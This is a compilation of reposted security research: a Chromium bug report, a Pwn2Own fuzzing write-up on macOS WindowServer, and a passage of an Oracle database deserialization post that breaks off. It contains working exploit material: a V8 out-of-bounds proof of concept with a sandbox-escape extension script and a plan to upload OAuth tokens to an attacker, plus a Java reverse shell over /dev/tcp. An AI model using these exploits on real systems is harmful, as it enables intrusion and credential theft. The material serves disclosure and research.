https://code.google.com/archive/p/tartetatintools/ https://github.com/0xPhoeniX/MazeWalker https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-MazeWalker.pdf https://github.com/poxyran/misc/blob/master/frida-heap-trace.py https://github.com/OALabs/frida-extract https://github.com/Nightbringer21/fridump https://edmcman.github.io/papers/oakland10.pdf https://edmcman.github.io/pres/oakland10.pdf https://github.com/falconre/falcon http://reversing.io/posts/palindrome-progress/ https://www.reddit.com/r/REMath/comments/8ml1ep/books_on_program_analysis/ http://bitblaze.cs.berkeley.edu/temu.html https://code.google.com/archive/p/flayer/ https://resources.infosecinstitute.com/pin-dynamic-binary-instrumentation-framework/ http://www.ckluk.org/ck/papers/pin_ieeecomputer10.pdf A simple PIN tool unpacker for the Linux version of Skype (mandatory) http://www.msreverseengineering.com/program-analysis-reading-list/ (mandatory) Dynamic Binary Modifications: Tools, Techniques & Applications (mandatory) https://riot.im/app/#/room/#programanalysis:disroot.org https://github.com/wapiflapi/villoc/blob/master/pintool/pintool.cpp http://www.computerix.info/skripten/mem-bugs.pdf https://en.wikibooks.org/wiki/Linux_Applications_Debugging_Techniques/Leaks https://en.wikipedia.org/wiki/Memory_debugger https://nebelwelt.net/publications/students/11fs-kravina-lightweight_memory_tracing.pdf https://panthema.net/2013/malloc_count/ http://www.burningcutlery.com/derek/docs/drmem-CGO11.pdf https://github.com/DataChi/memdb Videos Implementing an LLVM based Dynamic Binary Instrumentation framework DEF CON 15 - Quist and Valsmith - Covert Debugging HIRBSecConf 2009 - Travis Ormandy - Making Software Dumber Ole André Vadla Ravnås - Frida: The engineering behind the reverse-engineering Finding security vulnerabilities with modern fuzzing techniques (RuhrSec 2018) (multiple references to dynamic binary instrumentation) Sursa: http://deniable.org/reversing/binary-instrumentation1 point
-
VULNERABILITY DETAILS = Out-of-bounds access vulnerability in Array.concat() I use a bug in Array.concat() to execute arbitraty code in a sandbox. ---------------------------------------------------------------------- v8/src/runtime.cc [1] RUNTIME_FUNCTION(Runtime_ArrayConcat) { HandleScope handle_scope(isolate); ASSERT(args.length() == 1); CONVERT_ARG_HANDLE_CHECKED(JSArray, arguments, 0); int argument_count = static_cast<int>(arguments->length()->Number()); RUNTIME_ASSERT(arguments->HasFastObjectElements()); Handle<FixedArray> elements(FixedArray::cast(arguments->elements())); // Pass 1: estimate the length and number of elements of the result. // The actual length can be larger if any of the arguments have getters // that mutate other arguments (but will otherwise be precise). // The number of elements is precise if there are no inherited elements. ElementsKind kind = FAST_SMI_ELEMENTS; uint32_t estimate_result_length = 0; uint32_t estimate_nof_elements = 0; for (int i = 0; i < argument_count; i++) { HandleScope loop_scope(isolate); Handle<Object> obj(elements->get(i), isolate); uint32_t length_estimate; uint32_t element_estimate; if (obj->IsJSArray()) { Handle<JSArray> array(Handle<JSArray>::cast(obj)); length_estimate = static_cast<uint32_t>(array->length()->Number()); <<<<< Comment 1. This is first time, reference a length field of array. if (length_estimate != 0) { ElementsKind array_kind = GetPackedElementsKind(array->map()->elements_kind()); if (IsMoreGeneralElementsKindTransition(kind, array_kind)) { kind = array_kind; } } element_estimate = EstimateElementCount(array); } else { if (obj->IsHeapObject()) { if (obj->IsNumber()) { if (IsMoreGeneralElementsKindTransition(kind, FAST_DOUBLE_ELEMENTS)) { kind = FAST_DOUBLE_ELEMENTS; } } else if (IsMoreGeneralElementsKindTransition(kind, FAST_ELEMENTS)) { kind = FAST_ELEMENTS; } } length_estimate = 1; element_estimate = 1; } // Avoid overflows by capping at kMaxElementCount. if (JSObject::kMaxElementCount - estimate_result_length < length_estimate) { estimate_result_length = JSObject::kMaxElementCount; } else { estimate_result_length += length_estimate; <<<<< Comment 2. length_estimate, which is initialized in [Comment 1], is added to estimate_result_length. } if (JSObject::kMaxElementCount - estimate_nof_elements < element_estimate) { estimate_nof_elements = JSObject::kMaxElementCo unt; } else { estimate_nof_elements += element_estimate; } } ... ... Handle<FixedArray> storage; if (fast_case) { // The backing storage array must have non-existing elements to preserve // holes across concat operations. storage = isolate->factory()->NewFixedArrayWithHoles( <<<<< Comment 3. Create an array of size estimated_result_length. estimate_result_length); } else { // TODO(126): move 25% pre-allocation logic into Dictionary::Allocate uint32_t at_least_space_for = estimate_nof_elements + (estimate_nof_elements >> 2); storage = Handle<FixedArray>::cast( SeededNumberDictionary::New(isolate, at_least_space_for)); } ArrayConcatVisitor visitor(isolate, storage, fast_case); for (int i = 0; i < argument_count; i++) { Handle<Object> obj(elements->get(i), isolate); if (obj->IsJSArray()) { Handle<JSArray> array = Handle<JSArray>::cast(obj); if (!IterateElements(isolate, array, &visitor)) { <<<<< Comment 4. Call IterateElements() return isolate->heap()->exception(); } } else { visitor.visit(0, obj); visitor.increase_index_offset(1); } } if (visitor.exceeds_array_limit()) { return isolate->Throw( *isolate->factory()->NewRangeError("invalid_array_length", HandleVector<Object>(NULL, 0))); } return *visitor.ToArray(); <<<<< Comment 5. ToArray() create a corrupted Array. } ---------------------------------------------------------------------- Here is details on IterateElements() and ToArray(). ---------------------------------------------------------------------- v8/src/runtime.cc [1] static bool IterateElements(Isolate* isolate, Handle<JSArray> receiver, ArrayConcatVisitor* visitor) { uint32_t length = static_cast<uint32_t>(receiver->length()->Number()); <<<<< 4.1. This is second time, reference a length field of array. switch (receiver->GetElementsKind()) { ... } visitor->increase_index_offset(length); <<<<<<<<<< return true; } void increase_index_offset(uint32_t delta) { if (JSObject::kMaxElementCount - index_offset_ < delta) { index_offset_ = JSObject::kMaxElementCount; } else { index_offset_ += delta; <<<<<<<<< } } ---------------------------------------------------------------------- ---------------------------------------------------------------------- Handle<JSArray> ToArray() { Handle<JSArray> array = isolate_->factory()->NewJSArray(0); Handle<Object> length = isolate_->factory()->NewNumber(static_cast<double>(index_offset_)); <<<<< 5.1. local variable length is initalized with member variable index_offset_. Handle<Map> map = JSObject::GetElementsTransitionMap( array, fast_elements_ ? FAST_HOLEY_ELEMENTS : DICTIONARY_ELEMENTS); array->set_map(*map); array->set_length(*length); <<<<< array->set_elements(*storage_); <<<<< 5.2. However, storage_ is created with a size with [Comment 3]. return array; } ---------------------------------------------------------------------- (I can't definitely sure whether those above analysis is accurate or not.) Here is proof-of-concept. ---------------------------------------------------------------------- a = [1]; b = []; a.__defineGetter__(0, function () { b.length = 0xffffffff; }); c = a.concat(b); console.log(c); ---------------------------------------------------------------------- = From out-of-bounds to code execution Using out-of-bounds vulnerability in Array, attacker can trigger Use-after-free to execute code. 1. Create 2D Array, which contain corrupted Array(###) and normal Array(o), alternatively. [###########][ o ][###########][ o ][###########][ o ][###########][ o ] 2. free all normal Arrays(o) and 2D Array. 3. reference freed normal array(o) by corrupted array(###). ---------| [###########][ o ][###########][ o ][###########][ o ][###########][ o ] 4. Memory is not entirely clear, even normal Array(o) was freed. So we can use it as normal object. 5. Let an ArrayBuffer allocated on freed normal array(o) by creating many ArrayBuffer. 6. Through freed normal Array(o), manipulate ArrayBuffer's property(byteLength, buffer address) to arbitrary memory access. P.S. exploit is not optimized. = Sandbox bypassing via chrome extension Here, i describe exploit scenario and explain about sandbox escaping. Step 0. Victim open a malicious web page(Exploit). Step 1. Exploit let victim download a html page which will be executed on file:// origin. Step 2. After triggerring code execution vulnerability, open the html page(html page on step 1) by NavigateContentWindow(It use same functionality of chrome.embeddedSearch.newTabPage.navigateContentWindow of chrome://newtab). Step 3. Because of origin is file://. Attacker can access local files(read). but due to SecurityOrigin, use code execution flaws to change SecurityOrigin. Step 4. Upload user's oauth token information (%localappdata%/Google/Chrome/User Data/Default/Web Data) to attacker's server. Step 5. From now on, we can synchronize Chrome with the user's token(i'm not sure that there is additional security mechanism on OAuth to synchronize chrome browser). Step 6. Install extension for at Synchronized chrome. Step 7. During synchronization a user's Chrome install extension, too. [Step 4] may takes time. in case of windows, token file is encrypted with DPAPI. So, bruteforcing password for windows login is required to get a master key file at %appdata%/Microsoft/Protect/. [Step 6] use some vulnerability(?) in extension to bypass sandbox. In chrome://settings-frame/settings, user can change download.default_directory. Using chrome.downloads.showDefaultFolder(), chrome extension can open the directory on download.default_directory. but it doesn’t check whether directory path is file or directory. (in case of file, Chrome execute it) So, malicious attacker can bypass sandbox by set download.default_directory to an executable on external server(e.g. \\host\hihi.exe) then call chrome.downloads.showDefaultFolder(). I use debugger for extension to run JavaScript on chrome://settings-frame/settings. In general, url start with chrome:// is not attachable. but simple tricks as following works. view-source:chrome://settings-frame/settings about:settings-frame/settings Chrome extension code for sandbox escaping ---------------------------------------------------------------------- function sleep(milliseconds) { var start = new Date().getTime(); for (;;) { if ((new Date().getTime() - start) > milliseconds) break; } } chrome.tabs.create({url: "about:settings-frame/settings"}, function (tab) { chrome.debugger.attach({tabId: tab.id}, "1.0", function () { sleep(1000); chrome.debugger.sendCommand({tabId: tab.id}, "Runtime.evaluate", {expression: 'old = document.getElementById("downloadLocationPath").value; chrome.send("setStringPref", ["download.default_directory", "c:\\\\windows\\\\system32\\\\calc.exe"]);'}, function (o) { sleep(100); chrome.downloads.showDefaultFolder(); //open calc chrome.debugger.sendCommand({tabId: tab.id}, "Runtime.evaluate", {expression: 'chrome.send("setStringPref", ["download.default_directory", old]); window.close();'}); }); }); }); ---------------------------------------------------------------------- Tested on Windows 7 VERSION Chrome Version: 35.0.1916.153 stable Operating System: Windows 7 Sursa: https://bugs.chromium.org/p/chromium/issues/detail?id=3869881 point
-
Cracking the Walls of the Safari Sandbox Fuzzing the macOS WindowServer for Exploitable Vulnerabilities July 25, 2018 / Patrick Biernat & Markus Gaasedelen When exploiting real world software or devices, achieving arbitrary code execution on a system may only be the first step towards total compromise. For high value or security conscious targets, remote code execution is often succeeded by a sandbox escape (or a privilege escalation) and persistence. Each of these stages usually require their own entirely unique exploits, making some weaponized zero-days a ‘chain’ of exploits. Considered high risk consumer software, modern web browsers use software sandboxes to contain damage in the event of remote compromise. Having exploited Apple Safari in the previous post, we turn our focus towards escaping the Safari sandbox on macOS in an effort to achieve total system compromise. Using Frida to fuzz the macOS WindowServer from the lockscreen As the fifth blogpost of our Pwn2Own series, we will discuss our experience evaluating the Safari sandbox on macOS for security vulnerabilities. We will select a software component exposed to the sandbox, and utilize Frida to build an in-process fuzzer as a means of discovering exploitable vulnerabilities. Software Sandboxes Software sandboxing is often accomplished by restricting the runtime privileges of an application through platform-dependent security features provided by the operating system. When layered appropriately, these security controls can limit the application’s ability to communicate with the broader system (syscall filtering, service ACLs), prevent it from reading/writing files on disk, and block external resources (networking). Tailored to a specific application, a sandbox will aggressively reduce the system’s exposure to a potentially malicious process, preventing the process from making persistent changes to the machine. As an example, a compromised but sandboxed application cannot ransomware user files on disk if the process was not permitted filesystem access. A diagram of the old Adobe Reader Protected Mode Sandbox, circa 2010 Over the past several years we have seen sandboxes grow notably more secure in isolating problematic software. This has brought about discussion regarding the value of a theoretically perfect software sandbox: when properly contained does it really matter if an attacker can gain arbitrary code execution on a machine? The answer to this question has been hotly debated amongst security researchers. This discussion has been further aggravated by the contrasting approach to browser security taken by Microsoft Edge versus Google Chrome. Where one leads with in-process exploit mitigations (Edge), the other is a poster child for isolation technology (Chrome). As a simple barometer, the Pwn2Own results over the past several years seem to indicate that sandboxing is winning when put toe-to-toe against advanced in-process mitigations. There are countless opinions on why this may be the case, and whether this trend holds true for the real world. To state it plainly, as attackers we do think that sandboxes (when done right) add considerable value towards securing software. More importantly, this is an opinion shared by many familiar with attacking these products. THE (MEMORY CORRUPTION) SAFETY DANCE (13:25) at SAS 2017, by Mark Dowd However, as technology improves and gives way to mitigations such as strict control flow integrity (CFI), these views may change. The recent revelations wrought by Meltdown & Spectre is a great example of this, putting cracks into even the theoretically perfect sandbox. At the end of the day, both sandboxing and mitigation technologies will continue to improve and evolve. They are not mutually exclusive of each other, and play an important role towards raising the costs of exploitation in different ways. macOS Sandbox Profiles On macOS, there is a powerful low-level sandboxing technology called ‘Seatbelt’ which Apple has deprecated (publicly) in favor of the higher level ‘App Sandbox’. With little-to-no official documentation available, information on how to use the former system sandbox has been learned through reverse engineering efforts by the community (1,2,3,4,5, …). To be brief, the walls of Seatbelt-based macOS sandboxes are built using rules that are defined in a human-readable sandbox profile. A few of these sandbox profiles live on disk, and can be seen tailored to the specific needs of their specific application. For the Safari browser, its sandbox profile is comprised of the following to files (locations may vary): /System/Library/Sandbox/Profiles/system.sb /System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb The macOS sandbox profiles are written in a language called TinyScheme. Profiles are often written as a whitelist of actions or services required by the application, disallowing access to much of the broader system by default. ... (version 1) (deny default (with partial-symbolication)) (allow system-audit file-read-metadata) (import "system.sb") ;;; process-info* defaults to allow; deny it and then allow operations we actually need. (deny process-info*) (allow process-info-pidinfo) ... For example, the sandbox profile can whitelist explicit directories or files that the sandboxed application should be permitted access. Here is a snippet from the WebProceess.sb profile, allowing Safari read-only access to certain directories that store user preferences on disk: ... ;; Read-only preferences and data (allow file-read* ;; Basic system paths (subpath "/Library/Dictionaries") (subpath "/Library/Fonts") (subpath "/Library/Frameworks") (subpath "/Library/Managed Preferences") (subpath "/Library/Speech/Synthesizers") ... Serving almost like horse blinders, sandbox profiles help focus our attention (as attackers) by listing exactly what non-sandboxed resources we can interface with on the system. This helps enumerate relevant attack surface that can be probed for security defects. Escaping Sandboxes In practice, sandbox escapes are often their own standalone exploit. This means that an exploit to escape the browser sandbox is almost always entirely unique from the exploit used to achieve initial remote code execution. When escaping software sandboxes, it is common to attack code that executes outside of a sandboxed process. By exploiting the kernel or an application (such as a system service) running outside the sandbox, a skilled attacker can pivot themselves into a execution context where there is no sandbox. The Safari sandbox policy explicitly whitelists a number of external software attack surfaces. As an example, the policy snippet below highlights a number of IOKit interfaces which can be accessed from the sandbox. This is because they expose system controls that are required by certain features in the browser. ... ;; IOKit user clients (allow iokit-open (iokit-user-client-class "AppleMultitouchDeviceUserClient") (iokit-user-client-class "AppleUpstreamUserClient") (iokit-user-client-class "IOHIDParamUserClient") (iokit-user-client-class "RootDomainUserClient") (iokit-user-client-class "IOAudioControlUserClient") ... Throughout the profile, entries that begin with iokit-* refer to functionality we can invoke via an IOKit framework. These are the userland client (interfaces) that one can use to communicate with their relevant kernel counterparts (kexts). Another interesting class of rules defined in the sandbox profile fall under allow mach-lookup: ... ;; Remote Web Inspector (allow mach-lookup (global-name "com.apple.webinspector")) ;; Various services required by AppKit and other frameworks (allow mach-lookup (global-name "com.apple.FileCoordination") (global-name "com.apple.FontObjectsServer") (global-name "com.apple.PowerManagement.control") (global-name "com.apple.SystemConfiguration.configd") (global-name "com.apple.SystemConfiguration.PPPController") (global-name "com.apple.audio.SystemSoundServer-OSX") (global-name "com.apple.analyticsd") (global-name "com.apple.audio.audiohald") ... The allow mach-lookup keyword depicted above is used to permit the sandboxed application access to various remote procedure call (RPC)-like servers hosted within system services. These policy definitions allow our application to communicate with these whitelisted RPC servers over the mach IPC. Additionally, there are some explicitly whitelisted XPC services: ... (deny mach-lookup (xpc-service-name-prefix "")) (allow mach-lookup (xpc-service-name "com.apple.accessibility.mediaaccessibilityd") (xpc-service-name "com.apple.audio.SandboxHelper") (xpc-service-name "com.apple.coremedia.videodecoder") (xpc-service-name "com.apple.coremedia.videoencoder") ... XPC is higher level IPC used to facilitate communication between processes, again built on top of the mach IPC. XPC is fairly well documented, with a wealth of resources and security research available for it online (1,2,3,4, …). There are a few other interesting avenues of attacking non-sandboxed code, including making syscalls directly to the XNU kernel, or through IOCTLs. We did not spend any time looking at these surfaces due to time. Our evaluation of the sandbox was brief, so our knowledge and insight only extends so far. A more interesting exercise for the future would be to enumerate attack surface that currently cannot be restrained by sandbox policies. Target Selection Having surveyed some of the components exposed to the Safari sandbox, the next step was to decide what we felt would be easiest to target as a means of escape. Attacking components that live in the macOS Kernel is attractive: successful exploitation guarantees not only a sandbox escape, but also unrestricted ring-zero code execution. With the introduction of ‘rootless’ in macOS 10.11 (El Capitan), a kernel mode privilege escalation is necessary to do things such as loading unsigned drivers without disabling SIP. The cons of attacking kernel code comes at the cost of debuggability and convenience. Tooling to debug or instrument kernel code is primitive, poorly documented, or largely non-existent. Reproducing bugs, analyzing crashes, or stabilizing an exploit often require a full system reboot which can be taxing on time and morale. After weighing these traits and reviewing public research on past Safari sandbox escapes, we zeroed in on the WindowServer. A complex usermode system service that was accessible to the Safari sandbox over the mach IPC: (allow mach-lookup ... (global-name "com.apple.windowserver.active") ... ) For our purposes, WindowServer appeared to be nearly an ideal target: Nearly every process can communicate with it (Safari included) It lives in userland, simplifying debugging and introspection It runs with permissions essentially equivalent to root It has a relatively large attack surface It has a notable history of security vulnerabilities WindowServer is a closed-source, private framework (a library) which implies developers are not meant to interface with it directly. This also means that official documentation is non-existent, and what little information is available publicly is thin, dated, or simply incomplete. WindowServer Attack Surface WindowServer works by processing incoming mach_messages from applications running on the system. On macOS, mach_messages are a form of IPC to enable communication between running processes. The Mach IPC is generally used by system services to expose a RPC interface for other applications to call into. Under the hood, virtually every GUI macOS application transparently communicates with the WindowServer. As hinted by its name, the WindowServer system service is responsible for actually drawing application windows to the screen. A running application will tell the WindowServer (via RPC) what size or shape to make the window, and where to put it: The WindowServer renders virtually all desktop applications on macOS For those familiar with Microsoft Windows, the macOS WindowServer is a bit like a usermode Win32k, albeit less-complex. It is also responsible for drawing the mouse cursor, managing hotkeys, and facilitating some cross-process communication (among other many other things). Applications can interface with the WindowServer over the mach IPC to reach some 600 RPC-like functions. When the privileged WindowServer system service receives a mach_message, it will be routed to its respective message handler (a ‘remote procedure’) coupled with foreign data to be parsed by the handler function. A selection of WindowServer mach message handlers As an attacker, these functions prefixed with _X... (such as _XBindSurface) represent directly accessible attack surface. From the Safari sandbox, we can send arbitrary mach messages (data) to the WindowServer targeting any of these functions. If we can find a vulnerability in one of these functions, we may be able to exploit the service. We found that these 600 some handler functions are split among three MIG-generated mach subsystems within the WindowServer. Each subsystem has its own message dispatch routine which initially parses the header of the incoming mach messages and then passes the message specific data on to its appropriate handler via indirect call: RAX is a code pointer to a message handler function that is selected based on the incoming message id The three dispatch subsystems make for an ideal place to fuzz the WindowServer in-process using dynamic binary instrumentation (DBI). They represent a generic ‘last hop’ for incoming data before it is delivered to any of the ~600 individual message handlers. Without having to reverse engineer any of these surface level functions or their unique message formats (input), we had discovered a low-cost avenue to begin automated vulnerability discovery. By instrumenting these chokepoints, we could fuzz all incoming WindowServer traffic that can be generated through normal user interaction with the system. In-process Fuzzing With Frida Frida is a DBI framework that injects a JavaScript interpreter into a target process, enabling blackbox instrumentation via user provided scripts. This may sound like a bizarre use of JavaScript, but this model allows for rapid prototyping of near limitless binary introspection against compiled applications. We started our Frida fuzzing script by defining a small table for the instructions we wished to hook at runtime. Each of these instructions were an indirect call (eg, call rax) within the dispatch routines covered in the previous section. // instructions to hook (offset from base, reg w/ call target) var targets = [ ['0x1B5CA2', 'rax'], // WindowServer_subsystem ['0x2C58B', 'rcx'], // Renezvous_subsystem ['0x1B8103', 'rax'] // Services_subsystem ] The JavaScript API provided by Frida is packed with functionality that allow one to snoop on or modify the process runtime. Using the Interceptor API, it is possible to hook individual instructions as a place to stop and introspect the process. The basis for our hooking code is provided below: function InstallProbe(probe_address, target_register) { var probe = Interceptor.attach(probe_address, function(args) { var input_msg = args[0]; // rdi (the incoming mach_msg) var output_msg = args[1]; // rsi (the response mach_msg) // extract the call target & its symbol name (_X...) var call_target = this.context[target_register]; var call_target_name = DebugSymbol.fromAddress(call_target); // ready to read / modify / replay console.log('[+] Message received for ' + call_target_name); // ... }); return probe; } To hook the instructions we defined earlier, we first resolved the base address of the private SkyLight framework that they reside in. We are then able to compute the virtual addresses of the target instructions at runtime using the module base + offset. After that it is as simple as installing the interceptors on these addresses: // locate the runtime address of the SkyLight framework var skylight = Module.findBaseAddress('SkyLight'); console.log('[*] SkyLight @ ' + skylight); // hook the target instructions for (var i in targets) { var hook_address = ptr(skylight).add(targets[i][0]); // base + offset InstallProbe(hook_address, targets[i][1]) console.log('[+] Hooked dispatch @ ' + hook_address); } During the installed message intercept, we now had the ability to record, modify, or replay mach message contents just before they are passed into their underlying message handler (an _X... function). This effectively allowed us to man-in-the-middle any mach traffic to these MIG subsystems and dump their contents at runtime: Using Frida to sniff incoming mach messages received by the WindowServer From this point, our fuzzing strategy was simple. We used our hooks to flip random bits (dumb fuzzing) on any incoming messages received by the WindowServer. Simultaneously, we recorded the bitflips injected by our fuzzer to create ‘replay’ log files. Replaying the recorded bitflips in a fresh instance of WindowServer gave us some degree of reproducibility for any crashes produced by our fuzzer. The ability to consistently reproduce a crash is priceless when trying to identify the underlying bug. A sample snippet of a bitflip replay log looked like the following: ... {"msgh_bits":"0x1100","msgh_id":"0x7235","buffer":"000000001100000001f65342","flip_offset":[4],"flip_mask":[16]} {"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000038a1b63e00000000"} {"msgh_bits":"0x80001112","msgh_id":"0x732f","buffer":"0000008002000000ffffff7f","ool_bits":"0x1000101","desc_count":1} {"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000070f3a53e00000000","flip_offset":[12],"flip_mask":[2]} {"msgh_bits":"0x80001100","msgh_id":"0x722a","buffer":"0000008002000000dfffff7f","ool_bits":"0x1000101","desc_count":1,"flip_offset":[8],"flip_mask":[32]} ... In order for the fuzzer to be effective, the final step required us to stimulate the system to generate WindowServer message ‘traffic’. This could have been accomplished any number of ways, such as letting a user navigate around the system, or writing scripts to randomly open applications and move them around. But through careful study of pop culture and past vulnerabilities, we decided to simply place a weight on the ‘Enter’ key: 'Advanced Persistent Threat' On the macOS lockscreen, holding ‘Enter’ happens to generate a reasonable variety of message traffic to the WindowServer. When a crash occurred as a result of our bitflipping, we saved the replay log and crash state to disk. Conveniently, when WindowServer crashes, macOS locked the machine and restarted the service… bringing us back to the lockscreen. A simple python script running in the background sees the new WindowServer instance pop up, injecting Frida to start the next round of fuzzing. This was the lowest-effort and lowest-cost fuzzer we could have made for this target, yet it still proved fruitful. Discovery & Root Cause Analysis Leaving the fuzzer to run overnight, it produced a number of unique (mostly useless) crashes. Among the handful of more interesting crashes was one that looked particularly promising but would require additional investigation. We replayed the bitflip log for that crash against a new instance of WindowServer with lldb (the default macOS debugger) attached and were able to reproduce the issue. The crashing instruction and register state depicted what looked like an Out-of-Bounds Read: Process 77180 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8) frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214 SkyLight`_CGXRegisterForKey: -> 0x7fff55c6f677 <+214>: mov rax, qword ptr [rcx + 8*r13 + 0x8] 0x7fff55c6f67c <+219>: test rax, rax 0x7fff55c6f67f <+222>: je 0x7fff55c6f6e9 ; <+328> 0x7fff55c6f681 <+224>: xor ecx, ecx Target 0: (WindowServer) stopped. In the crashing context, r13 appeared to be totally invalid (very large). Another attractive component of this crash was its proximity to a top-level \_X... function. The shallow nature of this crash implied that we would likely have direct control over the malformed field that caused the crash. (lldb) bt * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8) * frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214 frame #1: 0x00007fff55c28fae SkyLight`_XRegisterForKey + 40 frame #2: 0x00007ffee2577232 frame #3: 0x00007fff55df7a57 SkyLight`CGXHandleMessage + 107 frame #4: 0x00007fff55da43bf SkyLight`connectionHandler + 212 frame #5: 0x00007fff55e37f21 SkyLight`post_port_data + 235 frame #6: 0x00007fff55e37bfd SkyLight`run_one_server_pass + 949 frame #7: 0x00007fff55e377d3 SkyLight`CGXRunOneServicesPass + 460 frame #8: 0x00007fff55e382b9 SkyLight`SLXServer + 832 frame #9: 0x0000000109682dde WindowServer`_mh_execute_header + 3550 frame #10: 0x00007fff5bc38115 libdyld.dylib`start + 1 frame #11: 0x00007fff5bc38115 libdyld.dylib`start + 1 Root cause analysis to identify the bug responsible for this crash took only minutes. Directly prior to the crash was a signed/unsigned comparison issue within _CGXRegisterForKey(...): Signed Comparison vulnerability in WindowServer WindowServer tries to ensure that the user-controlled index parameter is six or less. However, this check is implemented as a signed-integer comparison. This means that supplying a negative number of any size (eg, -100000) will incorrectly get us past the check. Our ‘fuzzed’ index was a 32bit field in the mach message for _XRegisterForKey(...). The bit our fuzzer flipped happened to be the uppermost bit, changing the number to a massive negative value: HEX | BINARY | DECIMAL ----------+----------------------------------+------------- BEFORE: 0x0000005 | 00000000000000000000000000000101 | 5 AFTER: 0x8000005 | 10000000000000000000000000000101 | -2147483643 ^ |- Corrupted bit Assuming we can get the currently crashing read to succeed through careful indexing to valid memory, there are a few minor constraints between us and what looks like an exploitable write later in the function: A write of unknown values (r15, ecx) can occur at the attacker controlled Out-of-Bounds index Under the right conditions, this bug appears to be an Out-of-Bounds Write! Any vulnerability that allows for memory corruption (a write) is generally categorized as an exploitable condition (until proven otherwise). This vulnerability has since been fixed as CVE-2018-4193. In the next post, we provide a standalone PoC to trigger this crash and detail the constraints that make this bug rather difficult to exploit while developing our full Safari sandbox escape exploit against the WindowServer. Conclusion Escaping a software sandbox is a necessary step towards total system compromise when exploiting modern browsers. We used this post to discuss the value of sandboxing technology, the standard methodology to escape one, and our approach towards evaluating the Safari sandbox for a means of escaping it. By reviewing existing resources, we devised a strategy to tackle the Safari sandbox and fuzz a historically problematic component (WindowServer) with a very simple in-process fuzzer. Our process demonstrates nothing novel, and that even contrived fuzzers are still able to find critical, real-world bugs. Sursa: http://blog.ret2.io/2018/07/25/pwn2own-2018-safari-sandbox/1 point
-
Wednesday, July 18, 2018 Oracle Privilege Escalation via Deserialization TLDR: Oracle Database is vulnerable to user privilege escalation via a java deserialization vector that bypasses built in Oracle JVM security. Proper exploitation can allow an attacker to gain shell level access on the server and SYS level access to the database. Oracle has opened CVE-2018-3004 for this issue. Deserialization Vulnerabilities Java deserialization vulnerabilities have been all the rage for the past few years. In 2015, Foxglove security published an article detailing a critical security vulnerability in many J2EE application servers which left servers vulnerable to remote code execution. There have been a number published exploits relying on Java deserializations since the 2015 Foxglove article, many based on the ysoserial library. There have also been a number of CVEs opened, and patches issued to resolve these defects, including Oracle specific CVEs such as CVE-2018-2628, CVE-2017-10271, CVE-2015-4852 The majority of the published exploits focus on application servers vulnerable to deserialization attacks. Today, however, I would like to explore Oracle Database and how it is vulnerable to a custom deserialization attack based on the tight integration of Java via Java Stored Procedures in Oracle Database. The examples in this post were created using Oracle 12C, however, earlier versions of Oracle Database are also vulnerable. Java Stored Procedures Oracle Enterprise Edition has a Java Virtual Machine embedded into the database and Oracle Database supports native execution of Java via Java Stored Procedures. ? 1 2 3 create function get_java_property(prop in varchar2) return varchar2 is language java name 'java.name.System.getProperty(java.lang.String) return java.lang.String'; / Basic JVM Protections Of course if you have some level of familiarity with Java and penetration testing, you may immediately leap to the notion of creating a reverse shell compiled within Oracle Database: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 SET scan off create or replace and compile java source named ReverseShell as import java.io.*; public class ReverseShell{ public static void getConnection(String ip, String port) throws InterruptedException, IOException{ Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","0<&126-;exec 126<>/dev/tcp/" + ip + "/" + port + ";/bin/bash <&126 >&126 2>&126"}); System.out.println(p.toString()); p.waitFor(); } } / create or replace procedure reverse_shell (p_ip IN VARCHAR2,p_port IN VARCHAR2) IS language java name 'ReverseShell.getConnection(java.lang.String, java.lang.String)'; / This approach will not work as the Oracle JVM implements fine grain policy-based security to control access to the OS and filesystem. Executing this procedure from a low-permissioned account results in errors. Note the error stack contains the missing permission and command necessary to grant the access: ? 1 2 ORA-29532: Java call terminated by uncaught Java exception: java.security.AccessControlException: the Permission (java.io.FilePermission /bin/bash execute) has not been granted to TESTER. The PL/SQL to grant this is dbms_java.grant_permission( 'TESTER', 'SYS:java.io.FilePermission','/bin/bash', 'execute' ) There have been previously reported methods to bypass the built-in Java permissions which will not be discussed in this post. Instead I am going to demonstrate a new approach to bypassing these permissions via XML deserialization. XML Deserialization XML serialization and deserializtion exist in Java to support cross platform information exchange using a standardized industry format (in this case XML). To this end, the java.beans library contains two classes: XMLEncoder and XMLDecoder which are used to serialize a Java object into an XML format and at a later time, deserialize the object. Typical deserialization vulnerabilities rely on the existence of a service that accepts and deserializes arbitrary input. However, if you have access to a low-privileged Oracle account that can create objects in the user schema (i.e., a user with connect and resource) you can create your own vulnerable deserialization procedure. As the "TESTER" user, I have created the following Java class "DecodeMe" and a Java Stored Procedure that invokes this class: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 create or replace and compile java source named DecodeMe as import java.io.*; import java.beans.*; public class DecodeMe{ public static void input(String xml) throws InterruptedException, IOException { XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes())); Object object = decoder.readObject(); System.out.println(object.toString()); decoder.close(); } } ; / CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS language java name 'DecodeMe.input(java.lang.String)'; / The decodeme procedure will accept an arbitrary string of XML encoded Java and execute the provided instructions. Information on the proper format for the serialized XML can be found here. This block will simply call println to output data to the terminal. ? 1 2 3 4 5 6 7 8 9 10 BEGIN decodeme('<?xml version="1.0" encoding="UTF-8" ?> <java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.lang.System" field="out"> <void method="println"> <string>This is test output to the console</string> </void> </object> </java>'); END; / The Vulnerability Of course we don't need a deserialization process to print output to the console, so how exactly is this process vulnerable? It turns out that the deserialization process bypasses JVM permission settings and allows a user to arbitrarily write to files on the OS. See the following example script: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 BEGIN decodeme(' <java 